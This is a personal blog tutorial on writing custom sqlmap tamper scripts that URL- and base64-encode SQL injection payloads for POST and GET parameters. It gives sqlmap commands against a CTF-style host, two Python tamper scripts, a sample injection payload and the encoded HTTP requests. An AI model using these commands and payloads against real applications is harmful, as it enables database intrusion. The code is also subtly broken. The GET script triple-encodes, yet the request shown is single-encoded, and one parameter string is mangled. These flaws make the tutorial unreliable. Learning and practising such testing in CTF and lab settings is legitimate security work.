Hey readers!
I’m sorry that it’s been long time since I’ve dropped an article here. I’ve just kicked off my college studies with a seemingly busy semester and I haven’t really got time to write a decent article for a little while.
Well, today I’m back! Yaayy!
In this article i’m going to discuss how to pre-process payloads using custom SQLmap tamper scripts, really, this is a very useful feature from sqlmap which can help when we want to encode / decode a payload with a parameter value in different formats before passing it through SQLmap for fuzzing.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Problem:¶
You might come across a web application that before querying for a userID, it first URL- and base64-decodes it’s value before it sends it to the database server for further actions. But then during pentesting, how would you take advantage of this data entry point to find out vulnerabilities like SQL Injection using SQLmap?
What actually happens is that the web application takes care of encoding (before placing the data on the client side) or decoding (after it has received the data on the backend side) of the requested data be it through POST or GET request methods.
So, how do we go about ?¶
_Certainly, by using Tamper Scripts. With SQLmap, you can use --tamper parameter to load a custom python script that modifies the payload._
But then, how do we write a custom tamper script to solve the above problem ?
I’ll split this solution into two parts describing different ways when dealing with POST and GET request methods.
Solution:¶
POST
It’s trivial to tamper with the entire POST query string. But here is a suggestion for a work-around:
Specify an empty data string in your SQLmap command (use the asterisk () to indicate the injection point) and declare a - -tamper script*:
$ ./sqlmap.py -u "http://site.ctf/" --data "*" --method POST --tamper mytamper.py
The tamper script in question could look like this:
#!/usr/bin/env python
import base64
import urllib
def tamper(payload, **kwargs):
params = 'param1=value1%s¶m2=value2' % payload
data = urllib.quote_plus(params)
data = base64.b64encode(data)
return data
This script inserts the payload into your query and performs the URL-encoding and base64 conversions. It currently tests for the param1 parameter. You would have to change the injection point manually if you want to check the other one.
For the sample payload ) AND 3825=3825 AND (7759=7759 you would end up with a request like this:
POST / HTTP/1.1
Host: site.ctf
User-agent: sqlmap/1.3.10#stable (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
[...]
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 92
Connection: close
cGFyYW0xJTNkdmFsdWUxKStBTkQrMzgyNSUzZDM4MjUrQU5EKyg3NzU5JTNkNzc1OSUyNnBhcmFtMiUzZHZhbHVlMg==
As you can see the POST body is URL- and base64-encoded.
GET
It’s a little bit trivial to tamper with the entire GET query string compared to POST query string. But here is a suggestion for a work-around:
Specify an injection point (and make sure the value before the injection point is encoded first) in your SQLmap command (use the asterisk () to indicate the injection point) and declare a - -tamper script*:
$ ./sqlmap.py -u "http://site.ctf/user/view?id=Njg=*" --cookie "cookie=pr89ff486ah534kb17q65silm2" --tamper mytamper.py
The tamper script in question could look like this:
#!/usr/bin/env python
import base64
import urllib
def tamper(payload, **kwargs):
params = '%s' % payload
data = urllib.quote_plus(params)
data = base64.b64encode(base64.b64encode(base64.b64encode(data)))
return data
Similar to POST’s script, this script inserts the payload into your query and performs the URL-encoding and base64 conversions. It currently tests for the id parameter.
For the sample payload ) AND 3825=3825 AND (7759=7759 you would end up with a request like this:
GET /user/view?id=Njg=KStBTkQrMzgyNSUzZDM4MjUrQU5EKyg3NzU5JTNkNzc1OQ== HTTP/1.1
Host: site.ctf
Accept-encoding: gzip,deflate
Cache-control: no-cache
Cookie: cookie=pr89ff486ah534kb17q65silm2
Accept: */*
User-agent: sqlmap/1.3.10#stable (http://sqlmap.org)
Connection: close
As you can see the GET body is URL- and base64-encoded.
These article was written based on my experience and thought if I could share something with you, hope this was helpful. Apologies if any typo will be spotted.
Contact me through Twitter “@bl4ckbo7”
Thanks, readers!
Happy Hacking! ;)